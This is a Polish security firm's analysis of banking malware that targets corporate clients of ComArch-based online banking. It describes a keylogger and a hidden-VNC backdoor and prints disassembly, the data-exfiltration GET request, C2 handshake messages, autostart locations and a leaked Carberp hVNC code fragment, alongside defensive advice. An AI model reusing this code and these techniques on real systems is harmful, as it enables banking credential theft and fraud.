Złośliwe oprogramowanie dla bankowości korporacyjnej

Wielkość: px
Rozpocząć pokaz od strony:

Download "Złośliwe oprogramowanie dla bankowości korporacyjnej"

Transkrypt

1 Złośliwe oprogramowanie dla bankowości korporacyjnej Nowy atak na klientów bankowości korporacyjnej 10 Grudzień, 2013 Na przełomie września i października 2013 roku Zespół Prevenity zidentyfikował aktywność nowego złośliwego oprogramowania, które jest wykorzystywane w nowym scenariuszu kradzieży pieniędzy z kont klientów polskich banków. Tym razem atak skierowany jest na klientów korporacyjnych głównie małe i średnie przedsiębiorstwa korzystające z usług bankowości internetowej. Wstęp Scenariusz ataku jest bardzo prosty. Intruz instaluje keylogger oraz oprogramowanie do zestawiania połączenia za pomocą zdalnego pulpitu typu VNC. Keylogger rejestruje dane uwierzytelniające, autoryzujące transakcje oraz hasło do klucza, którym podpisywane są transakcje finansowe. W przypadku bankowości korporacyjnej zazwyczaj transakcje podpisywane są kluczem prywatnym, który przechowywany jest na zewnętrznym nośniku (np. karcie inteligentnej) lub w pliku na tym samym komputerze. Jeśli komputer jest włączony i z komputera nie została wyjęta karta inteligenta, intruz może w dowolnym momencie połączyć się z komputerem i wykonać przelew. Na dzień dzisiejszy złośliwe oprogramowanie nakierowane jest na aplikacje bankowości internetowej, które wykorzystują do uwierzytelniania i autoryzacji rozwiązania polskiej firmy ComArch S.A.. Poniżej przykład jednej z kilku wersji złośliwego oprogramowania podszywającego się pod aplikacje ComArch S.A.. Rysunek 1: Malware Prevenity

2 Złośliwa aplikacja rejestruje wprowadzane dane do formularzy przeglądarek internetowych oraz między innymi wywoływanych okien aplikacji, gdy wymagane jest podpisanie dyspozycji. Poniżej przykłady wywoływanych okien oraz fragment zarejestrowanej aktywności jednego z zainfekowanych użytkowników. Należy zaznaczyć, że zidentyfikowany malware ma możliwość podmiany danych transakcji (tzw. Man in the Browser). Jest to istotne, gdyż część implementacji oprócz podania hasła wymaga podania kodu SMS. Na chwilę obecną zanotowano jedynie ataki polegające na autoryzacji opartej wyłącznie o podpis kluczem. Jednakże nie można wykluczyć użycia w przyszłości i tej funkcji złośliwego oprogramowania. Rysunek 2: Oryginalne okna aplikacji do autoryzacji transakcji. [] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] H [H] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] a [Ha] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] s [Has] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] l [Hasl] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] o [Haslo] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] [e] [&Podpisz] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] [Lbut] Rysunek 3: Fragment zapisu malware. Zarejestrowane dane (w tym hasła) przesyłane są co określony interwał czasu do jednego z serwerów kontrolowanych przez intruzów. Każdy katalog to nazwa komputera i nazwa użytkownika. Poniżej fragment zawartości serwera oraz przykładowa zawartość katalogu. Każdy plik odpowiada uruchomionej aplikacji, z której przechwytywana była aktywność użytkownika (nie tylko wybrane klawisze klawiatury ale i kliknięcia myszą). Prevenity

3 Przykładowy katalog: Przykładowy katalog: Rysunek 4: Drop Zone oraz zawartość katalogów z danymi. Zidentyfikowany botnet działa od początku października. Dwie główne domeny.biz zarejestrowano 16 września 2013 roku, jednakże malware w pliku konfiguracyjnym ma wprowadzone inne domeny, które jeszcze nie są zarejestrowane również w domenie.biz. Każdego dnia pojawia się około 5-6 nowych zainfekowanych hostów z Polski. Malware uruchomiony na stacjach roboczych połączony jest co najmniej do dwóch sieci botnet. Oprócz dobrze znanego złośliwego oprogramowania typu ZeuS/Citadel zastosowany został nowy malware bazujący na kodzie Carberp. Intruzi w nowym malware wykorzystali między innymi bibliotekę Hidden VNC do zestawiania zdalnego pulpitu inicjowanego ze strony zainfekowanej stacji roboczej. Komunikacja jest szyfrowana. Nawiązywane jest połączenie z serwerem w domenie.biz na porcie 999/TCP. Poniżej przykład komunikacji przed i po zaszyfrowaniu. {"type":"handsnake","guid":"{d112baae-e BE45AAD315AADB87}","BuildId":"n","CompName":"LABPC","SystemVersion":"Windows 7 Home Premium Edition, 64-bit Service Pack 1 (build 7601); Polski (Polska)","ProcessorType":64,"ProcessorsCount":2,"ProcessorSpeed":1995,"BotVersio n": ,"memorysize":5814,"token":false,"timezone":"gmt+01:00","uptime":1584, "IdleTime":578,"HaveWebCam":true,"UserName":"Prevenity","Online":1} {"type":"send_me_update_please"} {"type":"cam_attached"} {"type":"cam_detached"} Rysunek 5: Fragment komunikacji botnet przed szyfrowaniem. Prevenity

4 Rysunek 5: Fragment komunikacji botnet po zaszyfrowaniu. Zalecenia dla firm Poniżej przedstawiamy ogólne zalecenia, które powinny zminimalizować ryzyko infekcji i kradzieży środków z konta firmowego. 1. Należy na bieżąco aktualizować system operacyjny oraz definicje systemu antywirusowego. 2. Należy wyjmować kartę inteligentną po wylogowaniu się z systemu bankowości internetowej. 3. Używać dedykowany komputer tylko i wyłącznie do celów łączenia się systemem bankowości internetowej. Jeśli to nie jest możliwe, nie instalować/uruchamiać oprogramowania, którego pochodzenia nie jesteśmy pewni. 4. Weryfikować historię autoryzowanych transakcji (szczególnie tych wykonywanych w paczkach). Szczegółowe informacje o złośliwym oprogramowaniu Zespół Prevenity zidentyfikował następujące komponenty złośliwego oprogramowania używane w atakach na klientów bankowości korporacyjnej. 1. Aplikacja typu keylogger 2. Aplikacja typu backdoor Keylogger Aplikacja keylogger składa się z dwóch elementów. Są to następujące pliki: Plik wykonywalny svcnost.exe Biblioteka Project2.dll Prevenity

5 Nazwa pliku Svcnost.exe Project2.dll MD5 6CD31B85902F2C1B B3 2D175618B6EB D2186C9B59 A0D380C9C401D35510B78CBDC9CB1B15 Plik svcnost.exe dodaje wpis do klucza rejestru RUN. Przy wywołaniu uruchamiany jest proces potomny z parametrami start+49 mov eax, offset adefault ; "default" start+4e mov ds:startupinfo.lpdesktop, eax start+53 push offset ProcessInformation ; lpprocessinformation start+58 push offset StartupInfo ; lpstartupinfo start+5d push 0 ; lpcurrentdirectory start+5f push 0 ; lpenvironment start+61 push 0 ; dwcreationflags start+63 push 0 ; binherithandles start+65 push 0 ; lpthreadattributes start+67 push 0 ; lpprocessattributes start+69 push offset CommandLine ; "svcnost.exe " start+6e push 0 ; lpapplicationname start+70 call CreateProcessA Następnie ładowana jest biblioteka Project2.dll i uruchamia z niej funkcja Hozzok(). Zidentyfikowaliśmy dwie wersje biblioteki Project2.dll. Pierwsza wersja rejestruje aktywność użytkownika do pliku tekstowego, druga przesyła zarejestrowane dane na zdalny serwer. W obu przypadkach keylogger-a użyta została funkcja SetWindowsHookEx do zainstalowania procedury przechwytywania zdarzeń. Funkcja SetWindowsHookEx eksportowana jest przez user32.dll. W tym przypadku keylogger przechwytuje zdarzenia z kolejki zdarzeń poszczególnych wątków (WH_GETMESSAGE). HHOOK WINAPI SetWindowsHookEx( Prevenity

6 _In_ int idhook, //typ procedury = 3 = WH_GETMESSAGE _In_ HOOKPROC lpfn, //procedura_logowanie _In_ HINSTANCE hmod, _In_ DWORD dwthreadid //0 ); Keylogger korzysta między innymi z funkcji GetWindowText do kopiowania nagłówka. Dla przykładu po wejściu na stronę główną kopiowany i zapisywany przez malware jest nagłówek Gazeta.pl Polska i świat wiadomości informacje wydarzenia Mozilla Firefox. Ułatwia to późniejszą identyfikację strony, której dotyczy zapisany login/hasło. W zarejestrowanej funkcji zaimplementowany jest filtr identyfikujący nazwy uruchamianych procesów. Keylogger zaczyna rejestrować aktywność użytkownika, gdy nazwy procesów zawierają poniższe ciągi znaków: Prevenity

7 Poniżej fragment kodu identyfikującego aplikacje firmy ComArch. Jak można zauważyć poniżej, przez malware rejestrowana jest też aktywność innych aplikacji niezwiązanych z korporacyjną bankowością internetową. Prevenity

8 Co kilka sekund budowane jest zapytanie i aktywność użytkownika przesyłana jest na zdalny serwer. Poniżej przykład takiego zapytania: GET URL/1.php?u=HOSTNAME_USERNAME&p=firefox.exe&a=LOGI HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MALC) Host: nazwa_hosta Connection: Keep-Alive Fragment kodu odpowiedzialny za budowę i wysyłanie zapytania GET. Poniżej fragment zawartości serwera budowa katalogu to nazwa zainfekowanego komputer i użytkownika na którego uprawnieniach działa malware. Prevenity

9 Backdoor VNC Druga aplikacja składa się z jednego pliku wykonywalnego. Plik zabezpieczony jest własnym pakerem i posiada zaimplementowanych kilka mechanizmów utrudniających analizę dynamiczną. Na zainfekowanym komputerze nazwa pliku wykonywalnego może przypominać nazwy programu systemowego (np. regedit.exe, waitfor.exe), MD5 analizowanego pliku: 3CC7EAD85080A667F3235F4E31BC5501. Opis pliku wskazuje na program z pakietu Sysinternals TCPView. Po zainstalowaniu złośliwe oprogramowanie tworzy katalog dllcache i kopiuje tam plik wykonywalny. Poniżej wszystkie punkty autostart dla analizowanego malware: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\<nazwapliku>.lnk HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce HKCU\Control Panel\Desktop\Scrnsave.exe HKCU\Software\Microsoft\Command Processor\Autorun Prevenity

10 Gałąź HKCU jest używana w przypadku, gdy aplikacja nie jest uruchamiana z uprawnieniami administracyjnymi. Tworzony klucz to np. regedit z wskazaniem na plik regedit.exe w katalogu dllcache. Poniżej przykład: Większość zewnętrznych funkcji importowana jest dynamiczne. Poniżej kilka z nich, które będą używane do nawiązywania sesji VNC. Po uruchomieniu malware cześć kodu (dropper) ładowana jest do pamięci procesu explorer.exe. Kod ten monitoruje między innymi czy odpowiednie wpisy znajdują się w punktach autostart, wykrywa też obecność debuggera generując dużą ilość wątków dla monitorowanego procesu. Po uruchomieniu kod aplikacji sprawdza, czy w komputerze znajduje się karta inteligentna. Poniżej wykorzystywane funkcje API: SCardEstablishContext, SCardListReaders oraz SCardConnect. Dzięki temu intruz wie kiedy uzyskać dostęp do komputera w celu wykonania nieautoryzowanych transakcji. Prevenity

11 System zestawia szyfrowane połączenie VNC za pomocą komendy handsnake. Poniżej przykład komunikatu przed zaszyfrowaniem. {"type":"handsnake","guid":"{ D112BAAE-E BE45AAD315AADB87}","BuildId":"n","CompName":"LABPC","SystemVersion":"Windows 7 Home Premium Edition, 64-bit Service Pack 1 (build 7601); Polski (Polska)","ProcessorType":64,"ProcessorsCount":2,"ProcessorSpeed":1995,"BotVersio n": ,"memorysize":5814,"token":false,"timezone":"gmt+01:00","uptime":1584, "IdleTime":578,"HaveWebCam":true,"UserName":"Prevenity","Online":1} Funkcja zdalnego pulpitu bazuje na kodzie Hidden VNC, który dostępny jest w złośliwym oprogramowaniu Carberp (kod źródłowy wyciekł do Internetu na początku 2013 roku). Po uruchomieniu malware wywoływana jest funkcja VNCStartServer() a następnie NewClientAction(). Ta funkcja może uruchomić kamerę i/lub zdalny pulpit za pomocą funkcji API CreateDesktop(). rfbbool NewClientAction(rfbClientPtr cl) { PHVNC lpserver=(phvnc)cl->screen->screendata; cl->clientgonehook=clientgone; lpserver->eventsinfo.dwclients++; if (!cl->clientdata) cl->clientdata=memalloc(sizeof(hvnc_short_client_info)); HVNC_SHORT_CLIENT_INFO *lpclientinfo=(hvnc_short_client_info *)cl- >clientdata; lpclientinfo->dwlastkbdinputtime=lpclientinfo- >dwlastmouinputtime=gettickcount(); if (lpserver->deskinfo.bwebcam) #ifdef _HVNC_WEBCAM CamStartCapture(lpServer); #else ; #endif else if ((!lpserver->hdesktop) (!lpserver->dwexplorerspid) (!IsProcess(lpServer->dwExplorersPID))) { Prevenity

12 lpserver->hdesktop=createdesktopa(lpserver- >DeskInfo.szDeskName,NULL,NULL,DF_ALLOWOTHERACCOUNTHOOK,GENERIC_ALL,NULL); if (!lpserver->hdesktop) return FALSE; SetThreadDesktopEx(lpServer->hDesktop); lpserver->wndsinfo.hdeskwnd=getdesktopwindow(); Ciekawostki Jeden z naszych inżynierów w logach serwera znalazł zarejestrowaną aktywność intruza, który najprawdopodobniej testował złośliwe oprogramowanie i zapomniał je wyłączyć. Poniżej informacja o wybranych aktywnościach: Socks Admin //anonimowy dostęp przez systemy proxy oraz VPN Dostęp do paneli administracyjnych: o [Andromeda bot webpanel] o Zeus Control Panel o Exploit Kit [Neutrino - Mozilla Firefox] Sprawdzał jaki jest przelicznik EURO/PLN [Konverter Euro (EUR) og Polsk zlotych (PLN) : Valuta Exchange Rate Conversion Calculator - Mozilla Firefox] Próbki malware testuje na: [Scan4You.net - Online Anonymous Virus and Malware Scan - Mozilla Firefox] Oczywiście sprawdzał też, kto jest klientem firmy ComArch S.A. aby przeszukać następnie bazę botnet. [Comarch - global IT business solutions provider - Mozilla Firefox] [Lb][Lb] [Comarch Customers - Mozilla Firefox] [Lb][Lb][Lb][Lb][Lb] [CP :: Search in database - Mozilla Firefox] [Lb][Lb][ctrl]x[Lb] Prevenity

Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@

Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@ Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@ 24 marzec, 2014 Wstęp Tydzień temu do wielu skrzynek pocztowych w Polsce trafił email z linkiem do pliku podszywającego się pod nową aktualizację

Bardziej szczegółowo

Trojan bankowy Emotet w wersji DGA

Trojan bankowy Emotet w wersji DGA Trojan bankowy Emotet w wersji DGA Warszawa 17/11/2014 CERT Orange Polska Strona 1 z 7 Trojan bankowy Emotet został zauważony kilka miesięcy temu. Od tej pory zdaje się być cyklicznie wykorzystywany w

Bardziej szczegółowo

Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY

Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY 4 sierpnia 2014 r. W dniach 1 do 4 sierpnia 2014 r. poddaliśmy analizie oprogramowanie

Bardziej szczegółowo

Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA

Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA 21 Lipiec, 2014 W dniu 11 lipca 2014 zarejestrowaliśmy kolejną kampanię polegającą na rozsyłaniu złośliwego oprogramowania

Bardziej szczegółowo

Warszawa, 22 marca 2011. Mariusz.Burdach@prevenity.com. Wstęp

Warszawa, 22 marca 2011. Mariusz.Burdach@prevenity.com. Wstęp Warszawa, 22 marca 2011 Mariusz.Burdach@prevenity.com Wstęp Pod koniec lutego 2011 roku klienci kilku polskich banków zostali zaatakowani nową wersją złośliwego oprogramowania Zeus (ZBOT) ZITMO (Zeus In

Bardziej szczegółowo

Urządzenia mobilne Nowe szanse, nowe zagrożenia FWZQJAEHEPQABIRQS konkurs@prevenity.com

Urządzenia mobilne Nowe szanse, nowe zagrożenia FWZQJAEHEPQABIRQS konkurs@prevenity.com Urządzenia mobilne Nowe szanse, nowe zagrożenia Artur Maj, Prevenity FWZQJAEHEPQABIRQS konkurs@prevenity.com 1 Agenda Telefony komórkowe Rys historyczny Mobilne systemy operacyjne Bezpieczeństwo urządzeń

Bardziej szczegółowo

Analiza Malware Win32.KeyloggerSpy

Analiza Malware Win32.KeyloggerSpy Analiza Malware Win32.KeyloggerSpy CERT OPL Warszawa, 2014-09-23 CERT OPL Malware Analysis Strona 1 z 10 Testowana próbka została uzyskana z wiadomości SPAM, rozsyłanej losowo do polskich internautów.

Bardziej szczegółowo

Agenda. Rys historyczny Mobilne systemy operacyjne

Agenda. Rys historyczny Mobilne systemy operacyjne Mobilne zagrożenia Artur Maj, Prevenity Agenda Telefony komórkowe Rys historyczny Mobilne systemy operacyjne Bezpieczeństwo urządzeń smartphone Smartphone w bankowości Zagrożenia dla bankowości Demonstracja

Bardziej szczegółowo

Analiza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU

Analiza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU Warszawa, 16.03.2016 Analiza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU CERT OPL, Analiza vjw0rm; Autor: Iwo Graj Strona 1 z 14 W pierwszej połowie marca w polskim internecie

Bardziej szczegółowo

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http.

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. HTTP (ang. Hypertext Transfer Protocol) protokół transferu plików

Bardziej szczegółowo

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne

Bardziej szczegółowo

Analiza aktywności złośliwego oprogramowania Njw0rm

Analiza aktywności złośliwego oprogramowania Njw0rm Warszawa, 17.05.2016 Analiza aktywności złośliwego oprogramowania Njw0rm CERT OPL, Analiza Njw0rm; Autor: Iwo Graj Strona 1 z 22 W ostatnich dniach CERT Orange Polska wykrył w sieci klienckiej Orange Polska

Bardziej szczegółowo

Agenda. Urządzenia mobilne w transakcjach elektronicznych. - szanse i zagrożenia. Artur Maj, Prevenity. Przegląd rynku urządzeń mobilnych

Agenda. Urządzenia mobilne w transakcjach elektronicznych. - szanse i zagrożenia. Artur Maj, Prevenity. Przegląd rynku urządzeń mobilnych Urządzenia mobilne w transakcjach elektronicznych - szanse i zagrożenia Artur Maj, Prevenity Agenda Przegląd rynku urządzeń mobilnych Urządzenia mobilne w transakcjach elektronicznych Bezpieczeństwo urządzeń

Bardziej szczegółowo

Bezpieczeństwo usług oraz informacje o certyfikatach

Bezpieczeństwo usług oraz informacje o certyfikatach Bezpieczeństwo usług oraz informacje o certyfikatach Klienci banku powinni stosować się do poniższych zaleceń: nie przechowywać danych dotyczących swojego konta w jawnej postaci w miejscu, z którego mogą

Bardziej szczegółowo

Instrukcja logowania do systemu e-bank EBS

Instrukcja logowania do systemu e-bank EBS Instrukcja logowania do systemu e-bank EBS 1. Instalacja programu JAVA Przed pierwszą rejestracją do systemu e-bank EBS na komputerze należy zainstalować program JAVA w wersji 6u7 lub nowszej. Można go

Bardziej szczegółowo

Uwaga!!! Autentykacja LDAP/AD zaimplementowana w Vigor wspiera tylko proste uwierzytelnianie (hasło przesyłane jest jawnym tekstem).

Uwaga!!! Autentykacja LDAP/AD zaimplementowana w Vigor wspiera tylko proste uwierzytelnianie (hasło przesyłane jest jawnym tekstem). 1. Konfiguracja serwera VPN 1.1. LDAP/AD 1.2. Ustawienia ogólne 1.3. Konto SSL 2. Konfiguracja klienta VPN 3. Status połączenia 3.1. Klient VPN 3.2. Serwer VPN Procedura konfiguracji została oparta na

Bardziej szczegółowo

Mazowiecki Elektroniczny Wniosek Aplikacyjny

Mazowiecki Elektroniczny Wniosek Aplikacyjny Mazowiecki Elektroniczny Wniosek Aplikacyjny Generator Offline Instrukcja użytkownika Problemy z aplikacją można zgłaszad pod adresem: zgloszenie@mazowia.eu SPIS TREŚCI Zawartość 1 Instalacja Generatora

Bardziej szczegółowo

Instrukcja konfiguracji i uruchamiania połączenia VPN z systemami SAP

Instrukcja konfiguracji i uruchamiania połączenia VPN z systemami SAP Temat Połączenie z systemami SAP z wykorzystaniem połączenia VPN spoza sieci Uczelni Moduł: BASIS Wersja: 0.12 Data: 2009-05-05 Wersja. Data Wprowadzone zmiany Autor zmian 0.1 2007-12-03 Utworzenie dokumentu

Bardziej szczegółowo

Orange Polska S.A. Bezpieczeństwo Systemów Teleinformatycznych / Wydział Operacji Bezpieczeństwa

Orange Polska S.A. Bezpieczeństwo Systemów Teleinformatycznych / Wydział Operacji Bezpieczeństwa Warszawa, dnia 05.02.2016 Analiza kampanii złośliwego Oprogramowania E-Faktura Orange Win32.PWSZbot.fc CERT OPL analiza malware; autor: Iwo Graj Strona 1 z 7 1. Wstęp Znaczna liczba polskich internautów

Bardziej szczegółowo

Instrukcja użytkownika

Instrukcja użytkownika Instrukcja użytkownika Menadżer Licencji Wersja 2013.0.1 Spis treści 1 WPROWADZENIE... 3 2 AKTUALIZACJA SERWISU KLUCZA HASP ORAZ ZDALNEGO SERWISU KLUCZA... 3 3 INSTALACJA... 3 4 MONITOR MENADŻERA LICENCJI...

Bardziej szczegółowo

Forte Zarządzanie Produkcją Instalacja i konfiguracja. Wersja B

Forte Zarządzanie Produkcją Instalacja i konfiguracja. Wersja B Forte Zarządzanie Produkcją Instalacja i konfiguracja Wersja 2013.1.B Forte Zarządzanie Produkcją - Instalacja i konfiguracja Strona 2 z 13 SPIS TREŚCI 1 Instalacja i konfiguracja Forte Zarządzanie Produkcją...

Bardziej szczegółowo

Necurs analiza malware (1)

Necurs analiza malware (1) Necurs analiza malware (1) CERT OPL, Analiza Necurs; Autor: Tomasz Sałaciński Strona 1 z 9 W trakcie analizy powłamaniowej w systemie jednego z klientów Orange Polska uzyskano nową próbkę złośliwego oprogramowania.

Bardziej szczegółowo

Instrukcja obsługi serwera FTP v.28.12.2010

Instrukcja obsługi serwera FTP v.28.12.2010 Instrukcja obsługi serwera FTP v.28.12.2010 1. Dostęp klienta do konta FTP 1.1. Wprowadzić do przeglądarki adres ftp://87.204.185.42 lub alternatywny adres IP ftp://82.11.1160.114 1.2. Wprowadzić nazwę

Bardziej szczegółowo

Pomoc dla usługi GMSTHostService. GMSTHostService. Pomoc do programu 1/14

Pomoc dla usługi GMSTHostService. GMSTHostService. Pomoc do programu 1/14 GMSTHostService Pomoc do programu 1/14 Spis treści 1.Rejestracja...3 1.1.Pierwsza rejestracja...3 1.2.Ponowna rejestracja produktu...8 2.Podstawowe informacje o GMSTHostService...8 3.Przykładowa konfiguracja

Bardziej szczegółowo

Botnet Hamweq - analiza

Botnet Hamweq - analiza Botnet Hamweq - analiza CERT Polska / NASK 3 czerwca 2011 Oznaczenia Botmaster - osoba sprawująca kontrolę nad botnetem poprzez serwer CC. Zombie Botnet - zainfekowany komputer pod kontrolą botmastera.

Bardziej szczegółowo

Bezpieczeństwo aplikacji typu software token. Mariusz Burdach, Prevenity. Agenda

Bezpieczeństwo aplikacji typu software token. Mariusz Burdach, Prevenity. Agenda Bezpieczeństwo aplikacji typu software token Mariusz Burdach, Prevenity Agenda 1. Bezpieczeństwo bankowości internetowej w Polsce 2. Główne funkcje aplikacji typu software token 3. Na co zwrócić uwagę

Bardziej szczegółowo

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH.

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Spis treści 1. Konfiguracja poczty Exchange dla klienta pocztowego Outlook 2007 protokół Exchange

Bardziej szczegółowo

Instrukcja instalacji nośników USB w systemie internetowym Alior Banku

Instrukcja instalacji nośników USB w systemie internetowym Alior Banku Instrukcja instalacji nośników USB w systemie internetowym Alior Banku Nośnik USB służy do przechowywania klucza elektronicznego, używanego do logowania i autoryzacji transakcji. Opcja dostępna jest wyłącznie

Bardziej szczegółowo

OCHRONA PRZED RANSOMWARE

OCHRONA PRZED RANSOMWARE OCHRONA PRZED RANSOMWARE Konfiguracja ustawień Wprowadzanie zmian i proponowanych w niniejszym dokumencie polityk bezpieczeństwa polecamy wyłącznie administratorom, posiadającym szczegółową wiedzę nt swojej

Bardziej szczegółowo

Dostęp bezprzewodowy do Uczelnianej Sieci Komputerowej Politechniki Poznańskiej Instrukcja dla studentów Politechniki Poznańskiej

Dostęp bezprzewodowy do Uczelnianej Sieci Komputerowej Politechniki Poznańskiej Instrukcja dla studentów Politechniki Poznańskiej POLITECHNIKA POZNAŃSKA Dzial Sieci Teleinformatycznych Dostęp bezprzewodowy do Uczelnianej Sieci Komputerowej Politechniki Poznańskiej Dostęp bezprzewodowy do Uczelnianej Sieci Komputerowej Politechniki

Bardziej szczegółowo

Pomoc dla http://host.nask.pl/ 31.12.2012 r.

Pomoc dla http://host.nask.pl/ 31.12.2012 r. Pomoc dla http://host.nask.pl/ 31.12.2012 r. Spis treści Kontakt... 2 Logowanie do konta pocztowego przez WWW... 3 Logowanie do panelu administracyjnego... 4 Konfiguracja klienta pocztowego... 7 Umieszczanie

Bardziej szczegółowo

OCHRONA PRZED RANSOMWARE. Konfiguracja ustawień

OCHRONA PRZED RANSOMWARE. Konfiguracja ustawień OCHRONA PRZED RANSOMWARE Konfiguracja ustawień SPIS TREŚCI: Wstęp...................... 3 Dlaczego warto korzystać z dodatkowych ustawień...... 3 Konfiguracja ustawień programów ESET dla biznesu......

Bardziej szczegółowo

H-Worm RAT. Analiza aktywności złośliwego oprogramowania. CERT Orange Polska S.A. Warszawa, dnia

H-Worm RAT. Analiza aktywności złośliwego oprogramowania. CERT Orange Polska S.A. Warszawa, dnia Warszawa, dnia 16.02.2016 Analiza aktywności złośliwego oprogramowania H-Worm RAT CERT Orange Polska Analiza Malware H-Worm; Autor: Iwo Graj Strona 1 z 17 W ostatnich dniach CERT Orange Polska wykrył w

Bardziej szczegółowo

Asix Konfiguracja systemu Asix dla usługi Pulpitu zdalnego Remote Desktop Services, (Terminal Services)

Asix Konfiguracja systemu Asix dla usługi Pulpitu zdalnego Remote Desktop Services, (Terminal Services) NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI Asix Konfiguracja systemu Asix dla usługi Pulpitu zdalnego Remote Desktop Services, (Terminal Services) Pomoc techniczna (dla Asix od wersji 7 i systemu Windows

Bardziej szczegółowo

Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów aplikacji SODiR w technologii JS/PKCS 12

Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów aplikacji SODiR w technologii JS/PKCS 12 Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów aplikacji SODiR w technologii JS/PKCS 12 Wersja 3.0 02-03-2017 Spis treści Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów

Bardziej szczegółowo

Instrukcja instalacji czytnika kart mikroprocesorowych i konfiguracji przeglądarki internetowej do współpracy z systemem bankowości elektronicznej CIB

Instrukcja instalacji czytnika kart mikroprocesorowych i konfiguracji przeglądarki internetowej do współpracy z systemem bankowości elektronicznej CIB Instrukcja instalacji czytnika kart mikroprocesorowych i konfiguracji przeglądarki internetowej do współpracy z systemem bankowości elektronicznej CIB Spis treści: 1. Instalacja niezbędnych komponentów...

Bardziej szczegółowo

Certyfikat Certum Basic ID. Instrukcja dla użytkowników Windows Vista. wersja 1.3 UNIZETO TECHNOLOGIES SA

Certyfikat Certum Basic ID. Instrukcja dla użytkowników Windows Vista. wersja 1.3 UNIZETO TECHNOLOGIES SA Certyfikat Certum Basic ID Instrukcja dla użytkowników Windows Vista wersja 1.3 Spis treści 1. INSTALACJA CERTYFIKATU... 3 1.1. KLUCZ ZAPISANY BEZPOŚREDNIO DO PRZEGLĄDARKI (NA TYM KOMPUTERZE),... 3 1.2.

Bardziej szczegółowo

Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID

Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID wersja 1.3 Spis treści 1. INSTALACJA CERTYFIKATU... 3 1.1. KLUCZ ZAPISANY BEZPOŚREDNIO DO PRZEGLĄDARKI (NA TYM KOMPUTERZE),... 3 1.2.

Bardziej szczegółowo

Biuletyn techniczny. CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych. Copyright 2007 COMARCH SA

Biuletyn techniczny. CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych. Copyright 2007 COMARCH SA Biuletyn techniczny CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych Copyright 2007 COMARCH SA 1 Spis treści 1 SPIS TREŚCI... 2 2 DRUKARKI FISKALNE W USŁUGACH TERMINALOWYCH... 3 2.1 2.2 INSTALACJA

Bardziej szczegółowo

ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ

ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 3 do Część II SIWZ Wymagania

Bardziej szczegółowo

Analiza malware Keylogger ispy

Analiza malware Keylogger ispy Analiza malware Keylogger ispy Instalacja złośliwego oprogramowania W październiku na skrzynkę funkcyjną CERT Orange Polska otrzymaliśmy przysłany przez użytkownika mail z podejrzanym załącznikiem. Jeśli

Bardziej szczegółowo

Oprogramowanie OpenVPN jest oprogramowaniem darmowym, które można pobrać ze strony:

